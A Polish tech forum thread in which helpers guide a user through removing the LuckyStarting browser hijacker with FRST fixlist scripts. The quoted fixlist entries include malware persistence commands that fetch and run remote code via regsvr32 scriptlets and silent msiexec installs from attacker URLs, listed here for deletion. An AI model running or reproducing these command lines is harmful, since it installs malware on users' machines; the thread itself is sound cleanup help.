Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Kolejny przypadek z LuckyStarting

MrPuffPuff 10 Maj 2017 00:14 474 6
  • #1 10 Maj 2017 00:14
    MrPuffPuff
    Poziom 3  

    Witam,

    Tak jak w temacie sprawa dotyczy złośliwego LuckyStarting, które zastępuje jak pewnie wiecie stronę startową oraz silnik wyszukiwania.
    Zrobiłem już skan oraz czyszczenie AdwCleaner. Jak się okazało troche tego było aczkolwiek mam nadzieje, że zostało juz tylko LuckyStarting ale to się okaże. Poniżej zamiesczam logi z FRST.

    Dzieki i pozdrawiam :)

    0 6
  • CControls
  • #2 10 Maj 2017 06:17
    krzychupar
    Poziom 40  

    Odinstaluj jednego antywirsa, można mieć zainstalowanego tylko jednego.

    Otwórz notatnik systemowy i wklej:

    Task: {669FA961-116D-4AF1-9261-D82DE1E64BD7} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj83MdMyMUQYFkZSMkU2NTlQRjVYMTzWNWJYFkUyRjY5NH== scrobj.dll
    Task: {7C253F4C-FA37-47AD-8D16-9B86E82656BC} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA
    HKU\S-1-5-21-3067717316-3562332409-2289281827-1000\...\Run: [background_fault] => C:\Users\user\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== UWAGA
    HKU\S-1-5-21-3067717316-3562332409-2289281827-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj83MdMyMUQYFkZSMkU2NTlQRjVYMTzWNWJYFkUyRjY5NH== /q
    HKU\S-1-5-21-3067717316-3562332409-2289281827-1000\...\MountPoints2: G - G:\AutoRunMorrowind.exe
    HKU\S-1-5-21-3067717316-3562332409-2289281827-1000\...\MountPoints2: H - H:\AutoRunTribunal.exe
    HKU\S-1-5-21-3067717316-3562332409-2289281827-1000\...\MountPoints2: I - I:\AutoRunBloodmoon.exe
    HKU\S-1-5-21-3067717316-3562332409-2289281827-1000\...\MountPoints2: {4e9dd9bb-5c9c-11e6-8f3e-b46d837aa5f7} - F:\AutoRun.exe
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    Tcpip\..\Interfaces\{2D77BFC6-1499-4FB3-BDEF-95A19D3C6F03}: [DhcpNameServer] 172.20.10.1
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKU\S-1-5-21-3067717316-3562332409-2289281827-1000\Software\Microsoft\Internet Explorer\Main,Start Page =
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...500LM000-SSHD-8GB_W765R1WJXXXXW765R1WJ&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    U3 ahtdirdc; C:\Windows\System32\Drivers\ahtdirdc.sys [0 ] (Advanced Micro Devices) <==== UWAGA (zerobajtowy plik/folder)
    U3 aswbdisk; Brak ImagePath
    S1 galtfmoi; \??\C:\Windows\system32\drivers\galtfmoi.sys [X]
    S3 X6va062; \??\C:\Windows\SysWOW64\Drivers\X6va062 [X]
    2017-05-10 00:06 - 2017-05-10 00:06 - 00000000 ____D C:\ProgramData\SWCUTemp
    2017-05-10 00:03 - 2017-05-10 00:03 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-05-09 23:50 - 2017-05-09 23:59 - 00000000 ____D C:\AdwCleaner
    2017-05-09 12:32 - 2017-05-09 12:32 - 00000000 _____ C:\Windows\SysWOW64\1111
    2017-04-28 23:33 - 2017-05-08 13:48 - 00000000 _____ C:\Windows\SysWOW64\1
    2017-04-27 16:28 - 2017-04-27 16:28 - 00000000 ____D C:\Windows\psgo
    2017-04-26 13:56 - 2017-04-26 13:56 - 00000000 ____D C:\Users\Default\AppData\Roaming\Elex-tech
    2017-04-26 13:56 - 2017-04-26 13:56 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Elex-tech
    2017-04-17 19:56 - 2017-04-17 19:56 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-17 19:51 - 2017-05-02 10:29 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    C:\Users\user\AppData\Local\background_fault\aswRD.exe
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • CControls
  • #3 10 Maj 2017 07:48
    Kolobos
    Spec od komputerów

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • #5 10 Maj 2017 14:21
    Kolobos
    Spec od komputerów

    Sprawdz czy skrot, ktorym uruchamiasz FF nie ma dopisanego szkodliwego adresu we wlasciwosciach.

    Odinstaluj: AlphaGo

    Wykonaj Fixlist.txt dla FRST:
    R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
    S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
    U3 ak8opjkc; C:\Windows\System32\Drivers\ak8opjkc.sys [0 ] (Microsoft Corporation) <==== UWAGA (zerobajtowy plik/folder)
    2017-05-10 13:15 - 2017-05-10 13:16 - 00000000 ____D C:\AdwCleaner
    2017-05-08 16:26 - 2017-05-08 16:26 - 00000000 ____D C:\Users\Public\Documents\chrome
    2017-04-28 23:33 - 2017-05-09 12:34 - 00000000 ____D C:\Program Files\MK
    2017-04-28 23:33 - 2017-05-09 12:34 - 00000000 ____D C:\Program Files (x86)\AlphaGo
    2017-04-17 19:57 - 2017-04-17 19:57 - 00000000 ____D C:\ProgramData\Software
    2017-04-17 19:56 - 2017-05-09 22:32 - 00000000 ____D C:\Users\Default\AppData\Roaming\WinSAPSvc
    2017-04-17 19:56 - 2017-05-09 22:32 - 00000000 ____D C:\Users\Default User\AppData\Roaming\WinSAPSvc
    2017-04-13 21:13 - 2017-04-13 21:13 - 00000000 ____D C:\Users\user\AppData\Roaming\SSMgre

    0
  • #7 10 Maj 2017 16:53
    Kolobos
    Spec od komputerów

    Usun katalog C:\FRST i to wszystko.

    0